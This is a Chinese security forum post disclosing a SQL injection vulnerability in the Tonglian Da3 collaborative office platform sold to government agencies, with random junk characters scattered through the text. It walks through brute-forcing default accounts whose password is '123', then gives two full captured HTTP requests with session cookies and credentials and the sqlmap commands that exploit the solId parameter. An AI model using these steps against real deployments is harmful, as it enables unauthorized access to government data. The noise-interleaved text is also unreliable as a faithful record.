同联Da3协同办公平台前台通用sql injection漏洞

admin · 发表于 2018-10-20 20:15:17

@ w- r1 o0 n
6 ]( |' N5 [: f$ e* I0 M

5 W0 Q) O& e/ w6 i! ? 平台简介：' U3 g2 O- d# ~2 X% s& C4 f" R

# A! C& h! q/ ]' B+ i2 Y # i3 T' {% Y) E$ `' ?

# b" u9 c3 n( y# k3 S. o8 u 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( Q! g7 X! D' Q h$ X% F; W7 O同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! \% Z' w8 b! D+ o 同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ & H. z7 O' ^5 c

: w9 E, d# N+ E6 U6 o4 r 0 C* k3 T+ R8 X% [' Q% _. L

# K; v+ s }; f. \9 ^ 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址： ; H2 N+ ?0 I! v, w+ I4 c+ S) Q

+ s+ d9 f3 k" _7 N d# ?6 w f ! _; N0 F& M( b) A% R+ y

9 R3 J/ y5 m8 y1 }' G http://1.1.1.1:7197/cap-aco/#（案例2-） 6 D# y' R+ f s" {

0 O/ N' ?* W# o! j- m) \ http://www.XXOO.com （案例1-官网网站） 8 P7 y& o( ?: I7 {6 I) M( U3 x8 \

) B) i( G* @+ I, O1 ]0 @ * y ~+ V N7 a

% y+ M! S0 g0 g$ Q( l( ` 漏洞详情: - J* a$ @2 b. z' w4 b7 h

% j& k" ]5 ?3 |6 o4 `2 N 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试$ }/ d- z) ?) E( a$ j" a. H& _

; b0 X5 ?2 Z& k+ R 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图： f+ U0 k9 z+ [/ D D' S

: T; L( `9 E" r ! |& A- `1 z. _( X `

) w- E# u: d; m0 p [# q . _5 O; c* ]; O. `6 y

) W2 H, Z" z, f1 C status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： ) e6 g2 D; v* P) E$ ~/ O$ O; a; C

6 N- w. V* d1 I& n$ A 1、案例1-官方网站 ; \5 o* F/ Q7 a8 f+ _

" g3 F$ A8 R* a2 X* N- r! R GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.18 y+ f: \: m2 X) y1 v

( r9 w$ `$ E; W% U* _) V Host: www.XXOO.com ; X. G2 ]; V; ?- C: U

; o' d6 C- b( O8 @: c' A Proxy-Connection: Keep-Alive( u' B0 e) ?) j* D% q$ Y

9 ?9 V% }. R( t: q Accept: application/json, text/javascript, */*; q=0.01/ M& u. D7 }+ j. c& n7 e/ u( P

0 p7 _; v' i! `1 ` Accept-Language: zh-CN6 ?( h" i& o1 {$ i+ D7 }

g: m9 i0 h: G. y6 h Content-Type: application/json ! e: Z( S) \) `- y0 D, \

3 K5 S9 P2 r. N6 t! A User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko ' B. g" N0 z" b$ w6 E" z# _3 R

+ \4 V* o) p/ r" F( _( z X-Requested-With: XMLHttpRequest9 j1 h; c) O+ ?$ b- H4 P

3 W9 ?, W( N. J Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 ( q# A9 n2 w+ j

+ Z& |+ c- N$ l% ?& _: @, Z+ r Accept-Encoding: gzip, deflate, sdch * S% p0 O8 u d+ H. Q0 ~

, p5 J, Q; c( O Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e F/ Q: z8 h+ w

( m3 P) D& n6 E" B* O( w# H 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ; s- j1 U' w% f' I

2 B: S/ A1 h. e$ g : [. ~" f% N" O6 I

: {6 [$ w* j/ O# ~( u' E! P5 O6 h ( x( l" o- ]2 |; A* D8 t

: j) e+ z8 E! G5 m, h z1 Z# b* `- H8 U

+ T( B/ ^+ a& [; f; J( m; m % M0 [# A3 r' ]! ~( k' R% R

8 L) k L5 n! n/ H! V 1 t' f. x; j7 _4 R

3 c$ p$ X" e5 ?4 N+ J 2、案例2-某天河云平台 - I0 }1 G3 b6 s3 ?9 x/ a

. N9 l g- j! L; O F/ ~ GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1; @# W$ \$ g3 x1 ?9 z4 ]

, S) K; A) s8 b5 h( x Host: 1.1.1.:7197/ m Q9 B% t5 J% a0 {

9 V( k# n' J5 r0 V+ L5 ? Accept: application/json, text/javascript, */*; q=0.01. P! Z( N& s! ?, F- l+ V' _

# j' f# c/ k$ x" Y X-Requested-With: XMLHttpRequest # w2 V! h2 y# x2 K8 S$ @

7 |' \: \. @; b3 R! M User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0+ P( _2 S8 m1 `0 [

+ F; i4 H; L" k Content-Type: application/json: U! N+ s5 M" q, q

+ Y c+ @0 a8 l n Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008+ G ^! G9 {; x# d' f4 \/ K' v

: M* k, {. a; W$ X; w9 T Accept-Language: zh-CN,zh;q=0.8 ; A* t3 L/ f9 D* E7 o% ?

j; q% ^, f5 A ~) L Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1& m- Z3 [( S t% S6 p1 A3 @

v( u) D7 i% Q Connection: close: N( a* w; h: l5 J

; p& c& } q% @1 `& ^1 Y' T! z @ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: U# S& F F/ c

. A) }3 a/ b) ^4 E: K2 b. R 1 _: `% c( l$ y: P, {* @) g

& k. ^0 g: ]. i$ ]2 X; X% J
. W/ G; k& K" `8 x% h8 }4 g

		自动登录	找回密码
密码			立即注册

同联Da3协同办公平台前台通用sql injection漏洞

浏览过的版块